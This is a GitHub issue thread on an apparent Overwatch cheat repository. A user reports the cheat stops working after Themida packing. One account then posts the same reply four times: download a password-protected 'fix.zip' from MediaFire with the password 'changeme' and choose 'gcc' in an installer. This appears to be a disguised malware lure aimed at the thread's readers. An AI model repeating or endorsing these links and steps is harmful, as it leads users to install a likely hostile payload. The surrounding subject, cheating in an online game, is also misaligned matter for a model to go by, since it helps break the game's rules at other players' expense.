### ISSUE TITLE
Cheating failed

### ISSUE THREAD

**Issue by Tgyzxr** [Nobilous99/Overwatch-Rigel-Cheat#1]
After encrypting with Themida, Rigel.exe was protected and a new Rigelsprotected-exe was generated. And then there was no cheating effect

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
